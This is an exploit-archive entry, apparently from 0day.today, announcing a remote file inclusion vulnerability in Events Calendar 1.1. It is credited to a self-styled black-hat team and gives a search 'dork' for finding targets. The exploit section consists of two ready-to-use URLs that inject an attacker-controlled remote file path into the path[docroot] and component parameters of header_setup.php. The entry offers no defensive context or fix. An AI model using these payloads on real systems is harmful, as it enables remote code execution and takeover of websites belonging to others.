id: 3799
date: 09/28/2008
title: Events Calendar 1.1 Remote File Inclusion Vulnerability
author: k3vin mitnick
cves: 

=======================================================
Events Calendar 1.1 Remote File Inclusion Vulnerability
=======================================================


#########################################################
#
# Events Calendar 1.1

Remote File Inclusion Vulnerability


#========================================================
# Author: kevin mitnick( tunisianblackhat team ) =
#=========================================================
#
# script : Events Calendar 1.1#
http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html
# DorK : Events Calendar 1.1#
##########################################################

[~] Exploit :


http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L]
http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L]



#  0day.today [2023-03-26]  #